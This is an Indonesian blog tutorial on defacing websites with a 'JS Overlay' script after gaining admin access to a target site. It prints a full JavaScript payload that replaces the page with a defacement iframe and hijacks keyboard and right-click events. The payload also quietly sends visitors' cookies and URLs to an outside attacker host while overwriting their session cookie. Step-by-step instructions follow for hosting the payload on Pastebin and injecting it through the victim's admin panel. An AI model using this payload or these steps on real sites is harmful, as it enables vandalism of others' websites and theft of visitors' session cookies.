Beranda Deface Javascript Javascript Overlay Script Deface Metode JS Overlay

Selasa, 06 Juni 2017

Deface Metode JS Overlay

Diterbitkan

Banyak yang kebingungan ketika sudah dapat akses ke halaman admin tapi tidak bisa deface gara-gara shell gagal untuk diupload. Nah solusinya adalah menggunakan metode JS Overlay, jadi singkatnya fungsi JS Overlay ini adalah mengambil / menarik data dari halaman website yang masih terdeface oleh kita untuk ditimpa ke website target kita yang tidak bisa upload shell tadi.

Deface JS Overlay

Contoh :
1. http://web-tardeface.com/files/upload/deface.html (Asumsikan saja web dengan URL ini misalkan adalah web yang masih tertanam halaman deface kita)
2.  http://web-target.com/ (Asumsikan saja web ini yang mau kita deface tapi tidak bisa upload shell
Nah, pada website No2 kita posting Perintah Javascript yang berisikan perintah JS Overlay untuk menarik / mengambil data halaman deface kita di website No. 1 agar ditimpakan ke website No. 2

Sampai di sini paham?

Kalau paham mari kita lanjut, kalau kurang paham coba silahkan beri komentar di bawah. Oke saya anggap kalian paham ya hehe. Nah sekarang yang kita butuhkan adalah :
JS Overlay 
Perintah Javascript
  •  JS Overlay
 /* <style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/"> */
    document.getElementsByTagName('body')[0].innerHTML=""
    document.title="ORANGUTAN1BILLION"
    var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="http://i.imgur.com/hs2Zgt5.png";document.getElementsByTagName("head")[0].appendChild(shortc)
    function muter2(){
    scrW=screen.availWidth
    scrH=screen.availHeight
    window.moveTo(0,0)
    window.resizeTo(10,10)
    window.focus()
    for(x=0;x<80;x++){
    window.resizeTo(10,scrH*x/80)
    }
    for(y=0;y<80;y++){
    window.resizeTo(scrW*y/80,scrH)
    }
    window.resizeTo(scrW,scrH)
    }
    document.oncontextmenu=new Function("muter2();return false");
    function keypressed(){alert("ORANGUTAN1BILLION");}
    document.onkeydown=keypressed;
    function kasih_tau(){
    alert('ORANGUTAN1BILLION');
    }
    if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('ORANGUTAN1BILLION');",3000);
    else setTimeout("kasih_tau()",3000);
    if(navigator.userAgent.indexOf('MSIE')!=-1){
    document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://www.islamictube.com/shared/mailshot/ckeditor/kcfinder/upload/files/pepes.html' height='667px' width='1366px' scrolling='no' frameborder='0'></center>";
    }
    else{
    if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
    //muter2();
    log="";
    if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
    document.getElementsByTagName('body')[0].style.cssText=" background: #ff0084;
background: -moz-linear-gradient(top, #ff0084 0%, #0099b7 100%);
background: -webkit-linear-gradient(top, #ff0084 0%,#0099b7 100%);
background: linear-gradient(to bottom, #ff0084 0%,#0099b7 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ff0084', endColorstr='#0099b7',GradientType=0 );
text-align: center;"+log
    window.onload=function(){
    document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://www.islamictube.com/shared/mailshot/ckeditor/kcfinder/upload/files/pepes.html' height='667px' width='1366px' scrolling='no' frameborder='0'></center>";
    document.getElementsByTagName('body')[0].style.cssText=" background: #ff0084;
background: -moz-linear-gradient(top, #ff0084 0%, #0099b7 100%);
background: -webkit-linear-gradient(top, #ff0084 0%,#0099b7 100%);
background: linear-gradient(to bottom, #ff0084 0%,#0099b7 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ff0084', endColorstr='#0099b7',GradientType=0 );
text-align: center;";
    } } }
Warna Merah = Nama identitas kalian
Warna Hijau = Link shortcut icon, ganti link icon punya kalian
Warna Biru = Link website yang masih ditanami halaman deface kalian
  • Perintah Javascript
<script type="text/javascript" src="https://pastebin.com/raw/NbMnLEFM"></script>
Warna Jingga = Link JS Overlay yang kalian upload di Pastebin 

TUTORIAL
  • Daftar Akun Pastebin
Kalian coba daftar akun dulu di :
https://pastebin.com/
Gunanya untuk mengupload script JS Overlay di sana

  • Copy Link Pastebin
Setelah kalian daftar akun pastebin, coba upload JS Overlay yang ada di atas (edit dulu ya itu biar tampilannya defacenya tidak keupload punyaku -___-) Nah setelah kalian upload JS Overlaynya nanti akan muncul tampilan seperti ini :

Deface JS Overlay

Nah kalian klik Raw untuk menampilkan script JS Overlay secara utuh, setelah kalian klik Raw lalu cek URL di browser kalian, maka ini lah link utuh JS Overlay kalian, contoh:

Deface JS Overlay

Copy link pastebin yang ada /raw/ nya itu ke Perintah Javascript, contoh :
<script type="text/javascript" src="https://pastebin.com/raw/NbMnLEFM"></script>

  • Paste Link Perintah Javascript
Nah karena kalian sudah dapat akses halaman admin website target kalian, coba cari apa pun di halaman adminnya yang bisa posting Perintah Javascript yang sudah ada Link Pastebin RAW itu.

Upload  script pendek itu ke mana aja asal bisa tampil di halaman websitenya, contoh:

Deface JS Overlay

Nah ini hasil halaman index websitenya :


Deface JS Overlay

(2 screenshoot ini aku ambil dari blog http://blog.garudasecurityhacker.org, aku lupa screenshoot hasil deface JS Overlay punyaku, maafkeun -___-)

ARTIKEL TERKAIT

Lanjut
Sebelum


EmoticonEmoticon

Langganan: Posting Komentar (Atom)